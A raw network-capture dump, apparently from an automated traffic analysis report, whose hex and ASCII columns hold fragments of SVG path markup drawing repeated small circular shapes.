                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8154INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                                                                                                                          Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8170INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8186INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8204INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8985INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC9001INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC9017INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC9033INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC9049INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC9065INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC9081INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                                                                                                                          Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC9113INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC9129INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC9145INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC9161INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                                                                                                                          Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9625INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9641INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
